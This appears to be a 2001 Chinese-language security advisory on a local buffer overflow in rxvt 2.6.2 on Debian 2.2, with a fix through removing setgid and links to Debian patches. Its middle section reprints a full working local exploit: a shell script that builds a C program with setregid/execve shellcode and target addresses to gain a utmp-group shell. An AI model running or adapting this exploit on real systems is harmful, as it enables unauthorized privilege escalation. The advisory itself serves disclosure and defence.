安全研究
安全漏洞
Rxvt 本地缓冲区溢出漏洞
发布日期:2001-06-15
更新日期:2001-06-25
受影响系统:
描述:
rxvt 2.6.2
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
BUGTRAQ ID: 2878
CVE(CAN) ID: CAN-2001-1077
Rxvt 是一个彩色VT102中断仿真程序,可以作为xterm的替代软件。
rxvt存在一个缓冲区溢出漏洞。如果给它的某些命令行选项("-T"或者"-name")提供超长
的参数,就会触发缓冲区溢出。rxvt在某些系统下被设置了setgid utmp属性,本地攻击
者可能利用这个漏洞来获取utmp组权限。
有问题的代码在tt_printf()函数:
void
tt_printf(const char *fmt,...)
{
int i;
va_list arg_ptr;
unsigned char buf[256];
va_start(arg_ptr, fmt);
vsprintf(buf, fmt, arg_ptr);
va_end(arg_ptr);
tt_write(buf, strlen(buf));
}
<*来源:Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) 提供了
如下测试代码:
#!/bin/sh
#
# MasterSecuritY <www.mastersecurity.fr>
#
# xrxvt.sh - Local exploit for xrxvt 2.6.2
# Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
# Copyright (C) 2001 Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
echo "Which target :"
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
echo
echo -n "target : "
read TARGET
cat > /tmp/xx.c <<EOF
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int main()
{
char * p_ttyname;
char * argv[] = { "/bin/sh", NULL };
p_ttyname = ttyname( STDERR_FILENO );
if ( p_ttyname == NULL ) {
return( -1 );
}
if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
return( -1 );
}
if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
return( -1 );
}
execve( argv[0], argv, NULL );
return( -1 );
}
EOF
gcc -o /tmp/xx /tmp/xx.c
rm -f /tmp/xx.c
cat > /tmp/xrxvt.c << EOF
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#define BUF 256 /* buffer size */
#define EBP 4
#define EIP 4
#define ESC 3 /* alignment */
#define GID "\x2b"
#define DISPLAY ":0"
#define STACK ( 0xc0000000 - 4 )
Display *d;
char shellcode[] =
/* setregid( -1, GID ); */
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* setregid( GID, GID ); */
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* Aleph One ;) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";
struct os
{
int id;
char *desc;
char *path;
unsigned long plt;
unsigned long got;
};
struct os target[]=
{
{ 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
0x0804add0, 0x0805c964 },
{ 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
0x0804a690, 0x08059e1c },
{ 2, NULL, 0, 0 }
};
void usage ( char *cmd )
{
int i;
fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
fprintf(stderr, "usage: %s <target>\n",cmd);
fprintf(stderr, "with target:\n\n");
for( i < 0; i < sizeof(target) / sizeof(struct os); i++ )
fprintf(stderr, "%d. %s\n", i, target[i].desc);
exit( -1 );
}
int main(int argc, char *argv[])
{
char buffer[ BUF - ESC + EBP + EIP + 12 + 1];
char * exec_argv[] = { NULL, "-T", buffer, NULL };
char * envp[] = { shellcode, NULL };
int i, t;
char *path;
if ( argc != 2 )
usage(argv[0]);
t = atoi(argv[1]);
if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
usage( argv[0] );
path = (char *)malloc(strlen(target[t].path)+1);
strcpy(path,target[t].path);
if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
exit(10);
}
for ( i = 0; i < BUF - ESC + EBP; i++ ) {
buffer[ i ] = 'A';
}
*( (size_t *) &(buffer[i]) ) = target[t].plt;
i += sizeof(size_t);
*( (size_t *) &(buffer[i]) ) = target[t].got + 4;
i += sizeof(size_t);
*( (size_t *) &(buffer[i]) ) = target[t].got + 4;
i += sizeof(size_t);
*( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
i += sizeof(size_t);
buffer[i] = '\0';
exec_argv[0] = path;
execve( exec_argv[0], exec_argv, envp );
return( -1 );
}
EOF
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
rm -f /tmp/xrxvt.c
echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
echo "And see ..."
/tmp/xrxvt $TARGET
建议:
临时解决方法:
我们建议您暂时去掉rxvt的setuid/setgid属性:
# chmod a-s rxvt
厂商补丁:
Debian Linux (http://www.debian.org/security/)为此发布了一份安全公告 :
DSA-062-1 rxvt: buffer overflow
http://www.debian.org/security/2001/dsa-062
补丁下载 -
________________________________________________________________________
Debian GNU/Linux 2.2 (potato)
Source:
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.dsc
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2.orig.tar.gz
Alpha:
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb
ARM:
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb
Intel IA-32:
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb
Motorola 680x0:
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb
PowerPC:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb
Sun Sparc:
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb
________________________________________________________________________
浏览次数:4209
严重程度:0(网友投票)
绿盟科技给您安全的保障